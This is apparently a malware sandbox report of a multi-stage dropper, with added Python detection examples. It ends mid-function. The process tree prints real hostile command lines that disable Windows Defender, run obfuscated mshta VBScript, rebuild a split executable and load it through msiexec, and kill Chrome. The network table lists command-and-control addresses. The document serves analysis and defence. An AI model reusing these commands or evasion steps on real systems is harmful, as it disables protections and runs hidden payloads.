| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\msiexec.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
Kills process with taskkill
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\taskkill.exe | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious behavior: GetForegroundWindowSpam
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe | N/A |
Suspicious use of AdjustPrivilegeToken
Suspicious use of WriteProcessMemory
Processes
C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
"C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe
"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\setup_install.exe"
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu123e05ebe43921.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu124078ed79bdbd5.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu126011caea28.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1231d30cda84872.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu120bfbc2443b3b5d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu122f7469b214cb59.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12912263469836d.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1262fd911d3e6320.exe
Thu1262fd911d3e6320.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12ca1c119bc29.exe /mixone
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12b275ee70c7e913.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu12465fe68f85b6156.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /c Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu123e05ebe43921.exe
Thu123e05ebe43921.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu122f7469b214cb59.exe
Thu122f7469b214cb59.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12465fe68f85b6156.exe
Thu12465fe68f85b6156.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12ca1c119bc29.exe
Thu12ca1c119bc29.exe /mixone
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12b275ee70c7e913.exe
Thu12b275ee70c7e913.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe
Thu12493eba7a.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu120bfbc2443b3b5d.exe
Thu120bfbc2443b3b5d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
Thu125e541847539.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu124078ed79bdbd5.exe
Thu124078ed79bdbd5.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu1231d30cda84872.exe
Thu1231d30cda84872.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-VPJ0P.tmp\Thu125e541847539.tmp" /SL5="$301C6,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 2136 -s 484
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "" == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe
"C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp
"C:\Users\Admin\AppData\Local\Temp\is-8FFJH.tmp\Thu125e541847539.tmp" /SL5="$9018A,140785,56832,C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu125e541847539.exe" /SILENT
C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe
yDhNY.exe /pFKkSWJQc5v2ppVFMo
C:\Windows\SysWOW64\taskkill.exe
taskkill -f -Im "Thu12493eba7a.exe"
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If ""/pFKkSWJQc5v2ppVFMo "" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\System32\cmd.exe" /q /c copY /Y "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If "/pFKkSWJQc5v2ppVFMo " == "" for %Q In ( "C:\Users\Admin\AppData\Local\Temp\yDhNY.Exe") do taskkill -f -Im "%~nXQ"
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu126011caea28.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu128b511c77e8c.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12912263469836d.exe
C:\Windows\SysWOW64\mshta.exe
"C:\Windows\System32\mshta.exe" VBSCRiPT: cLoSe(CREATeOBJEcT ( "WScRIPt.SHEll" ). rUN ( "C:\Windows\system32\cmd.exe /Q /R eCHo | set /P = ""MZ"" > 1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck + DeMa.eP+ y~A7GJIO.E + 6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7 ", 0 ,trUE) )
C:\Windows\SysWOW64\cmd.exe
"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7
C:\Windows\SysWOW64\cmd.exe
cmd.exe /c taskkill /f /im chrome.exe
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" eCHo "
C:\Windows\SysWOW64\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" set /P = "MZ" 1>1FRnX.N"
C:\Windows\SysWOW64\taskkill.exe
taskkill /f /im chrome.exe
C:\Windows\SysWOW64\msiexec.exe
msiexec.exe -Y .\ISA502G.S7
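Four behaviours in the process tree above are the ones worth alerting on: the two PowerShell calls that switch off Defender real-time monitoring and add a Temp exclusion, mshta.exe started with an inline vbscript: URI, the cmd.exe chain that rebuilds a PE from headerless fragments and hands the result to msiexec -Y, and taskkill against chrome.exe ahead of browser credential theft. The following is an added example, not part of the sandbox report: a small Python command-line scanner run over those exact command lines (copied here as constructed sample input). The rule names and regular expressions are this example's own; the ATT&CK mappings are the standard technique IDs for Impair Defenses, Mshta, Msiexec and Deobfuscate/Decode, and the browser kill is left unmapped because no single technique fits it.

```python
from __future__ import annotations
import re
from typing import NamedTuple

# Command lines copied from the process tree above (constructed sample input).
SAMPLE_CMDLINES = [
    r'C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable',
    r'powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"',
    r'"C:\Windows\System32\mshta.exe" vbscRIPT: Close ( creATeoBjEct ( "wscRiPT.sHElL"). RUn ("cmD.exe /q /c copY /Y ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" yDhNY.Exe && STArt yDhNY.exe /pFKkSWJQc5v2ppVFMo &If """" == """" for %Q In ( ""C:\Users\Admin\AppData\Local\Temp\7zS058E7057\Thu12493eba7a.exe"" ) do taskkill -f -Im ""%~nXQ"" " , 0, TRue ) )',
    r'"C:\Windows\system32\cmd.exe" /Q /R eCHo | set /P = "MZ" >1FRnX.N & CopY /b /y 1FRNX.N+ XGUd2JE.9Ck +DeMa.eP+ y~A7GJIO.E +6Q6HY.Re ISA502G.S7 & stART msiexec.exe -Y .\ISA502G.S7',
    r'taskkill /f /im chrome.exe',
    r'msiexec.exe -Y .\ISA502G.S7',
    r'C:\Windows\system32\cmd.exe /c Thu128b511c77e8c.exe',   # plain launcher, must not match
]


class Rule(NamedTuple):
    name: str
    attack: str            # MITRE ATT&CK technique ID, "" where no single ID fits
    pattern: re.Pattern


# All patterns are case-insensitive on purpose: the sample mixes case
# (creATeoBjEct, CopY /b, stART) precisely to defeat case-sensitive matching.
RULES = [
    Rule("defender_realtime_off", "T1562.001",
         re.compile(r"set-mppreference\b.*-disablerealtimemonitoring\s+\$?true", re.I)),
    Rule("defender_exclusion", "T1562.001",
         re.compile(r"add-mppreference\b.*-exclusion(path|process|extension)", re.I)),
    Rule("mshta_inline_vbscript", "T1218.005",
         re.compile(r'mshta(\.exe)?"?\s+(vbscript|javascript):', re.I)),
    Rule("pe_reassembly_copy_b", "T1140",
         re.compile(r'set\s+/p\s*=\s*"?MZ"?.*copy\s+/b', re.I)),
    Rule("msiexec_register_dll", "T1218.007",
         re.compile(r"msiexec(\.exe)?\s+[-/]y\b", re.I)),
    Rule("browser_process_kill", "",
         re.compile(r'taskkill\b.*[-/]im\s+"?(chrome|msedge|firefox|opera|brave)\.exe', re.I)),
]


def scan(cmdline: str) -> list[str]:
    """Names of every rule that fires on one command line, in rule order."""
    return [r.name for r in RULES if r.pattern.search(cmdline)]


def scan_all(cmdlines: list[str]) -> list[tuple[str, list[str]]]:
    """(cmdline, matched rule names) for every line that fired at least once."""
    return [(c, hits) for c in cmdlines if (hits := scan(c))]


def attack_ids(cmdlines: list[str]) -> set[str]:
    """Distinct ATT&CK technique IDs covered by the matches."""
    by_name = {r.name: r.attack for r in RULES}
    return {by_name[n] for c in cmdlines for n in scan(c) if by_name[n]}


if __name__ == "__main__":
    for cmdline, hits in scan_all(SAMPLE_CMDLINES):
        print(f"{', '.join(hits):45} {cmdline[:70]}")
    print("ATT&CK:", sorted(attack_ids(SAMPLE_CMDLINES)))
```

The reassembly line fires two rules at once (the copy /b rebuild and the msiexec -Y registration), which is the strongest single signal in this tree; the plain `cmd.exe /c <name>.exe` launchers fire nothing and should not, since they are how setup_install.exe starts every dropped file.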
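The last cmd.exe chain deserves a closer look. The payload is stored with its first two bytes removed and spread over files with random names and extensions (XGUd2JE.9Ck, DeMa.eP, y~A7GJIO.E, 6Q6HY.Re), so nothing on disk starts with MZ until run time. `echo | set /P = "MZ" > 1FRnX.N` is meant to leave exactly the two bytes MZ on disk with no newline (set /P prints its prompt without one), `copy /b` concatenates the stub and the fragments back together in argument order, and `msiexec.exe -Y` loads the result and calls its DllRegisterServer export (msiexec's documented /y option), so the payload runs under a signed Microsoft binary. The following is an added example, not code from the report, that replays that sequence in Python on a constructed toy image and shows the check that still catches the first fragment on its own: the PE signature sits at the offset stored at 0x3C, so in a headerless fragment it is found at e_lfanew minus 2.

```python
import struct

# Fragment order taken from the copy /b line in the process tree above.
FRAGMENT_NAMES = ["XGUd2JE.9Ck", "DeMa.eP", "y~A7GJIO.E", "6Q6HY.Re"]


def build_toy_pe(body_len: int = 512) -> bytes:
    """Constructed stand-in for a PE image: 'MZ', e_lfanew at 0x3C -> 'PE\\0\\0' at 0x80, filler body.
    Not a real executable; only the header geometry matters here."""
    hdr = bytearray(0x80)
    hdr[0:2] = b"MZ"
    struct.pack_into("<I", hdr, 0x3C, 0x80)            # e_lfanew points at the NT headers
    return bytes(hdr) + b"PE\0\0" + bytes(range(256)) * (body_len // 256)


def split_like_dropper(pe: bytes, names: list[str]) -> dict[str, bytes]:
    """Drop the leading 'MZ' and spread the remainder over the named fragments in order."""
    body = pe[2:]
    size = -(-len(body) // len(names))                  # ceiling division
    return {n: body[i * size:(i + 1) * size] for i, n in enumerate(names)}


def set_p_stub(prompt: bytes = b"MZ") -> bytes:
    """Bytes that `echo | set /P = "MZ" > file` is meant to leave on disk: the prompt, no newline."""
    return prompt


def copy_b(parts: list[bytes]) -> bytes:
    """copy /b a+b+c out: plain binary concatenation in argument order."""
    return b"".join(parts)


def reassemble(fragments: dict[str, bytes], order: list[str]) -> bytes:
    """The copy /b step: MZ stub first, then the fragments in the order given on the command line."""
    return copy_b([set_p_stub()] + [fragments[n] for n in order])


def looks_like_headerless_pe(blob: bytes) -> bool:
    """True if blob is a PE image whose first two bytes were removed.

    In a full image e_lfanew lives at 0x3C and points at 'PE\\0\\0'; with 'MZ'
    stripped, both the field and its target sit two bytes earlier."""
    if len(blob) < 0x3E + 4:
        return False
    e_lfanew = struct.unpack_from("<I", blob, 0x3C - 2)[0]
    off = e_lfanew - 2
    return 0 <= off <= len(blob) - 4 and blob[off:off + 4] == b"PE\0\0"


def find_headerless_fragments(fragments: dict[str, bytes]) -> list[str]:
    """Names of fragments that carry the shifted DOS/NT header, i.e. the first piece of a split PE."""
    return [n for n, b in fragments.items() if looks_like_headerless_pe(b)]


if __name__ == "__main__":
    pe = build_toy_pe()
    frags = split_like_dropper(pe, FRAGMENT_NAMES)
    print("fragments starting with MZ:", [n for n, b in frags.items() if b.startswith(b"MZ")])
    print("headerless PE fragments  :", find_headerless_fragments(frags))
    print("rebuilt == original      :", reassemble(frags, FRAGMENT_NAMES) == pe)
```

A per-file "does it start with MZ" check, which is what most dropped-file triage does, reports nothing for any of the four fragments; only the reassembled ISA502G.S7, or the process-level view of copy /b followed by msiexec -Y, exposes the payload. The e_lfanew-minus-2 check recovers the first fragment before reassembly, and the remaining fragments are found by name from the same command line.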
Network
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| NL | 45.133.1.107:80 | | tcp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 8.8.8.8:53 | gcl-gb.biz | udp |
| US | 8.8.8.8:53 | www.listincode.com | udp |
| US | 8.8.8.8:53 | iplogger.org | udp |
| US | 8.8.8.8:53 | t.gogamec.com | udp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 8.8.8.8:53 | c.pki.goog | udp |
| GB | 142.250.200.3:80 | c.pki.goog | tcp |
| US | 8.8.8.8:53 | propanla.com | udp |
| US | 8.8.8.8:53 | niemannbest.me | udp |
| US | 8.8.8.8:53 | www.iyiqian.com | udp |
| SG | 13.251.16.150:80 | www.iyiqian.com | tcp |
| US | 8.8.8.8:53 | cdn.discordapp.com | udp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| US | 8.8.8.8:53 | all-mobile-pa1ments.com.mx | udp |
| US | 8.8.8.8:53 | buy-fantasy-football.com.sg | udp |
| US | 8.8.8.8:53 | topniemannpickshop.cc | udp |
| N/A | 127.0.0.1:49293 | | tcp |
| N/A | 127.0.0.1:49295 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| US | 8.8.8.8:53 | pastebin.com | udp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 8.8.8.8:53 | wfsdragon.ru | udp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| US | 104.21.5.208:80 | wfsdragon.ru | tcp |
| FR | 51.178.186.149:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| US | 8.8.8.8:53 | www.microsoft.com | udp |
| DE | 2.21.137.121:80 | www.microsoft.com | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| FR | 91.121.67.60:2151 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 45.9.20.13:80 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
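Read as a whole, the table above separates into a few kinds of traffic: DNS to 8.8.8.8, one-shot lookups of ip-api.com and iplogger.org (the external IP and geolocation checks listed in the summary), fetches from pastebin.com and cdn.discordapp.com (the abused legitimate hosting), direct-to-IP HTTP on port 80 with no name behind it, and two raw endpoints on odd ports, 194.104.136.5:46013 and 135.181.129.119:4805, contacted over and over, which is the footprint of a beaconing C2 channel. The following is an added example, not part of the report: a Python parser for this table that accepts both ways sandbox exports lay out a row with no domain (protocol in the Domain column, or an empty Domain cell and the protocol in its own column) and turns the rows into a ranked C2 candidate list and an indicator set. The categories, the hit threshold, and the assumption that www.microsoft.com and c.pki.goog are sandbox background traffic rather than the sample's own are this example's own; the rows in SAMPLE_TABLE are a constructed subset copied from the table above.

```python
from __future__ import annotations
from collections import Counter
from dataclasses import dataclass

# Constructed sample input: a subset of the rows above, in both layouts.
SAMPLE_TABLE = """\
| Country | Destination | Domain | Proto |
| NL | 45.133.1.107:80 | tcp | |
| US | 8.8.8.8:53 | marianu.xyz | udp |
| US | 8.8.8.8:53 | ip-api.com | udp |
| US | 208.95.112.1:80 | ip-api.com | tcp |
| US | 104.26.2.46:443 | iplogger.org | tcp |
| US | 162.159.133.233:443 | cdn.discordapp.com | tcp |
| FI | 135.181.129.119:4805 | tcp | |
| FR | 91.121.67.60:2151 | tcp | |
| NL | 194.104.136.5:46013 | tcp | |
| N/A | 127.0.0.1:49293 | tcp | |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| US | 172.67.19.24:443 | pastebin.com | tcp |
| NL | 194.104.136.5:46013 | | tcp |
| FI | 135.181.129.119:4805 | | tcp |
| DE | 2.21.137.121:80 | www.microsoft.com | tcp |
| FI | 135.181.129.119:4805 | tcp |
"""

COMMON_PORTS = {53, 80, 443}
# Groupings are this example's own, based on the signatures in the summary.
LOOKUP_SERVICES = {"ip-api.com", "iplogger.org"}          # external IP / geolocation / tracking
ABUSED_HOSTING = {"pastebin.com", "cdn.discordapp.com"}   # legitimate services used for hosting/C2
BACKGROUND = {"www.microsoft.com", "c.pki.goog"}          # assumed sandbox noise, not the sample


@dataclass(frozen=True)
class Conn:
    country: str
    ip: str
    port: int
    domain: str     # "" when the sandbox logged no name for the flow
    proto: str      # "tcp" or "udp"


def parse_rows(text: str) -> list[Conn]:
    """Parse '| Country | Destination | Domain | Proto |' rows.

    The protocol is located by value rather than by column, so rows that put
    'tcp' in the Domain column parse the same as correctly aligned ones."""
    conns: list[Conn] = []
    for line in text.splitlines():
        line = line.strip()
        if not line.startswith("|"):
            continue
        cells = [c.strip() for c in line.strip("|").split("|")]
        if len(cells) < 3 or cells[0].lower() == "country":
            continue
        country, dest, rest = cells[0], cells[1], cells[2:]
        ip, _, port = dest.rpartition(":")
        if not port.isdigit():
            continue
        proto = next((c.lower() for c in rest if c.lower() in ("tcp", "udp")), "")
        domain = next((c for c in rest if c and c.lower() not in ("tcp", "udp")), "")
        conns.append(Conn(country, ip, int(port), domain, proto))
    return conns


def classify(c: Conn) -> str:
    if c.ip == "127.0.0.1":
        return "loopback"
    if c.port == 53 and c.proto == "udp":
        return "dns"
    if c.domain in BACKGROUND:
        return "background"
    if c.domain in LOOKUP_SERVICES:
        return "ip_or_geo_lookup"
    if c.domain in ABUSED_HOSTING:
        return "abused_hosting"
    if c.proto == "tcp" and c.port not in COMMON_PORTS:
        return "c2_candidate"       # raw endpoint on an odd port: loader/stealer C2 pattern
    if c.proto == "tcp" and not c.domain:
        return "direct_ip_http"     # hard-coded IP download, no DNS to pivot on
    return "other"


def category_counts(conns: list[Conn]) -> Counter:
    return Counter(classify(c) for c in conns)


def c2_candidates(conns: list[Conn], min_hits: int = 2) -> list[tuple[str, int]]:
    """Odd-port TCP endpoints ranked by how often they were contacted (repeat hits = beaconing)."""
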